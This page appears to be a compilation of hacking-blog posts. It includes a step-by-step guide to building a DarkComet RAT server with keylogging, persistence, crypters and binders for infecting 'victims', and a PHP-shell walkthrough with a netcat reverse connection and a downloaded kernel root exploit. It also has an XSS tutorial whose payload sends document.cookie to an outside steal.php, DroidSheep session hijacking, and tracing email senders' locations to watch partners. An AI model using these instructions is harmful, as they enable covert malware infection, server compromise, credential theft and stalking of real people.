CEH-v7 Lab Set-up

Certified Ethical Hacker Version7 (CEH-v7) Lab Set-up and Video Tutorials

                               

CEH-v7 Lab Set-up and Video Tutorials

CEH Lab Set-Up 

Download here

The Social-Engineer Toolkit v1.4

Social-Engineer Toolkit v1.4 latest Version !

The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Official change log:

1. Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit.
2. Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request.
3. Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path
4. Fixed a bug in the new backtrack5 to recognize airmon-ng
5. Added the ability to import your own code signed certificate without having to generate it through SET
6. Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one
7. Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead
8. Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion
9. Added a new menu to the main SET interface that is the new verified codesigning certificate menu
10. Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input
11. Added more documentation around the core modules in the SET User_Manual
12. Updated the SET_User manual to reflect version 1.4

 Download here

TRACE LOCATION OF SENDER IN GMAIL

TRACE IP LOCATION OF SENDER IN GMAIL

You might be receiving many mails through your Gmail account.  Gmail is one of the most popular email service. Every day billions of people use it for communication purposes. Though you receive most of your emails from your known acquaintances. But sometimes it may so happen that you may like to know the physical location of email sender.

You may be in to some sort of business and might be looking to confirm the identity of the person you are dealing with. Person may be tricking you for some short term gains. You may be able to obtain the physical location of Gmail sender if you can get hold of IP address of the sender.

This is quite easy. When you open your Gmail account, you can find the Reply button on the right side. On clicking the Reply button you would see an image like this. On clicking the “Show original” one would be guided to the “headers” page.

Originating IP address of

202.162.253.75

can be found out by using location lookup on the IP address.  IP2Location and GeoBytes IP Locator are two excellent utilities to find out the physical location. One has to just enter the IP address in the location finder form on the website.

This utility may be of tremendous use for the person who intend to keep an eye on their partners. Through the location finder one can find the exact location from where the mail has been send. This example is of Gmail. Similar things can be tried out in Yahoo and Outlook as well. Once you have the IP address, you have the location of the email sender.

DARKCOMET RAT

100% WORKING SERVER WITH DARKCOMET RAT

RAT or Remote Administration Tool is a tool which helps to administers the system of a person without physical access to the system.This tool is highly used by a hacker and is very efficient.If a hacker is able to get installed a server (which can easily be done) in victims system then entire system of the victim is with the hacker! He can check logs,take screenshots,browse your folders,disable your anti-virus and much more !

RAT is basically a Trojan which has two parts :

Client : It can be considered as King which plays with or manipulates with the server(slave) which he has made.

Server: It can be considered as a Slave which is installed on the host (remote).

So now I'll talk about  how to create a successful Server with one of the Best RAT's available, that is DarkComet (v5.1) which is coded in Delphi XE and Delphi 2007.

So here it goes :

1. Download DarkComet (v5.1 is what I'll use here,but the basic process is same for all version so don't worry)

     http://www.darkcomet-rat.com/

2.Now we will start building up the server.exe file.

   Click on the Blue Icon saying "DarkComet", go to "Server module" and choose ''Full editor" option.

   You'll get something like this -

                          

   

   Keep a security password if you want to.               

   Click on Random 4-5 times to generate new Mutex and see to it that Active FWB is checked.

2.Another column which you will see there is of PORT . DarkComet uses port 1604 so make sure it is open and forwarded.To know how to forward your port,visit http://portforward.com/ -here you will get all the information about how to forward your port for your type of Modem.

3.Keep the following setting in module startup -

  

You can also check ''persistence installation'' if you want to(i recommend it).

 4.Following setting are ideal for Module Shield -

                   

                                

5.After this all the options may vary from person to person as per your requirement but i recommend to Activate the Offline Keylogger .

6.Compress the server if you want and you are done,click on ''Build the Stub" and a process will take place in which you will be able to see the algorithms and your server.exe is made (name it as per your requirement but keep .EXE intact)

                                   

                                  

Your server is Built now ! :)

But now problem arises that how will you send the server to the victim over internet as .EXE files cannot be transferred via facebook,yahoo,gmail or other sites.

So here come crypters and binders into play !

Crypters - It is software which is used to crypt your server to make it FUD (Fully Undetectable )

Binders - A binder is software which pumps up the size of your RAT which is usually in Kb's to some Mb's!

You can do this by binding your RAT with some song ,image etc.

MulCi Shellcode

MulCi Shellcode for Website Hacking

What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back connect' tab and insert the following settings:

1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\KroKite>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:

Code:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686

Now, we go on exploit-db.com and we will look for '2.6.17'.

Code:

hhttp://www.exploit-db.com/exploits/5092/

Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.

Code:

wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o

Read more

SSLsplit for man-in-the-middle attack

SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encryptednetwork connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both

IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs

forged X509v3 certificates on-the-fly, based on the original server certificate

subject DN and subjectAltName extension. SSLsplit fully supports Server Name

Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and

ECDHE cipher suites. SSLsplit can also use existing certificates of which the

private key is available, instead of generating forged ones. SSLsplit supports

NULL-prefix CN certificates and can deny OCSP requests in a generic way.

SSLsplit version 0.4.5 released on Nov 07, change logs are

- Add support for 2048 and 4096 bit Diffie-Hellman.

- Fix syslog error messages (issue #6).

- Fix threading issues in daemon mode (issue #5).

- Fix address family check in netfilter NAT lookup (issue #4).

- Fix build on recent glibc systems (issue #2).

- Minor code and build process improvements.

 Download here

BYPASS ''SURVEYS''

BYPASS THE ''SURVEYS'' WITHOUT DISCLOSING YOUR PERSONAL INFORMATION!

We often come across sites in which we have to forcefully do a survey because we have to download a file or see some content.

In all of these surveys we are forced to disclose our personal information like our phone number , email id  etc.

Later these sites irritate you with their sms's spam mails of offers in which you not at all are  interested !

So i've found a way by which you can get through these sites without leaking out your personal information !

Let's start -

1.Download this add on called ''greasemonkey'' for mozilla firefox (mozilla is needed ).

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

After installing it,it would appear like this in your browser -

     
2.After installing it download this script which runs with the help of this add on(greasemonkey) --

http://userscripts.org/scripts/show/2560

Install this script and make sure the monkey on the right side of your mozilla screen is colored (which means greasemonkey is activated,to activate or deactivate just click on it)

3.Now go to the site which tells you to do the survey and asks for your information  etc..

4.You'll see an option on top left side of the page which says '' Press CTRL+SHIFT+F to fill in form. ''

Do as directed..press  CTRL+SHIFT+F and you will see that the form gets filled on its own and all the information filled out there is completely random !

Click on submit and you are registered on the site and now you can easily download what you wanted to ! :)

This is all random stuff filled by the script.

    

                                                    BUT

6.Some sites may tell you to verify your identity by logging into your mail and opening some url or to get some pin ! For this all you have to so is go to http://www.yopmail.com/en/ . Go to this site and you'll get a temporary email id for around 15-30min.>paste that temporary email id at the place of email id which your intelligent form filler has randomly filled>click on submit form.

Here ''yoyo@yopmail.com'' is the yopmail email id which is replaced by the default id given by ''form filler''

    

 7.Check http://www.yopmail.com/en/ Inbox for the mail from the site>Get the pin or confirmation link>you are done !:-)

Here as you can see two mails from the site where we have to forcefully register and the confirmation link plus password (other mails are just spam,ignore them).

                                                    OR

8.Some sites may ask you for voice calls confirmation ..I have the solution for that too :)

In that case go to this site http://www.k7.net/ ..on this site you can receive voice calls via mail ! So you bypass Survey again without giving any details !

            Register here and you'll be able to receive voice calls via mail.

BeEF-Browser Exploitation Framework

BeEF version 0.4.3.9-alpha 

The Browser Exploitation Framework BeEF ( Browser Exploitation Framework) is a powerful penetration testing tool that focuses on the web browser.  Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.  Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. 

 Download here

XSS injection [Beginner Tutorial]

Basics of XSS injection [Beginner Tutorial] 

What is Cross Site Scripting:

XSS Stands for Cross Site Scripting, xss is a vulnerability that is normal found

in a web app. XSS allows the user to inject malicious codes such as HTML and

Java script. XSS can be used to steal cookies, make phishing pages and

just having some fun with the website

What is A cookie:

A cookie is a text-only string that gets entered into the memory of your browser.

This value of a variable that a website sets. If the lifetime of this value is set

to be longer than the time you spend at that site, then this string

is saved to file for future reference.

What can XSS do:

Cross Site Scripting is used commonly now days in the cyber

world. XSS can take down most websites that are up to date,

Cross Site Scripting can steal cookies from websites/forums.

Make pop ups, appear were there not suppose to "search bars"

etc. Or you can even do some very malicious codes such as

redirect the website to another one.

Hacking forums/guest books with XSS:

Forum Hacking: Now in order to defaced or even attempt

to hack a forum. The forum must have HTML enabled, so you can

enter some malicious codes. If the forum does have HTML enabled

then you can enter codes such as;

Code:

<html>
<head><title>XSS tut by computermaniac </title></head>
<body>
<img src="javascript:alert('Defaced By: chennaihackers')">
</body>
</html>

If the forum allows the image tags then you can use this tag to

steal peoples cookies.

Code:

<img src="javascript:window.location=&amp;#39;http://www.url.com/steal.php?account=&amp;#39;+document.cookie&quot;>

Now to get to guest book hacking when your posting on the guest book

it must also be vulnerable. Meaning html must be enabled, to see if html

is enabled put these tags in your post <B>hello world</B> and if your

text comes back bold. Then html is enabled now try doing other techniques

you can also put some java script inside the html and see if that works.

And if it does or if it doesn't you can still deface the guest book with writing

up some cool html codes that take up the whole guest book page.

Defacing Websites with Cross Site Scripting:

Till now you AHian know Cross Site Scripting is used alot now days to exploit

websites and forums.Mostly search functions etc. Now some of the common XSS'es now days are within the search bars for websites. To make a box pop

up saying what every you put in the script. Some XSS codes are;

Code:

<script>alert("1337`")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert(1337`);</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>war10rd made you click on link</b>'>war10rd`</a>

Now how can I deface a website with just making 1 little pop up on

the search bar page? You can redirect the site to your website or your friends or you can steel cookies. Make a html defacement page and put the whole code

in your script.

Android SESSION HIJACKING TOOL 'DROIDSHEEP'

SESSION HIJACKING TOOL 'DROIDSHEEP' - TUTORIAL

Session Hijacking refers to an attack in which a hacker temporarily hijacks the ongoing session of the user and he is able to see what the user is doing on his mobile,computer be it accessing facebook,gmail or any other site.

Note- Rooted Android is required .

Steps of using :

1.Open the app.

2.Check "ARP-Spoofing" and "Genreic Mode".

3.Click on Start.

4.In some time you will start getting various sessions on the same network of wifi.Click on then see what the person is doing.

Working of Droidsheep : Basically,Droidsheep catches the packets which are send by the device to the router.The packets are received on hackers phone and the hacker further exploits them.

 Download here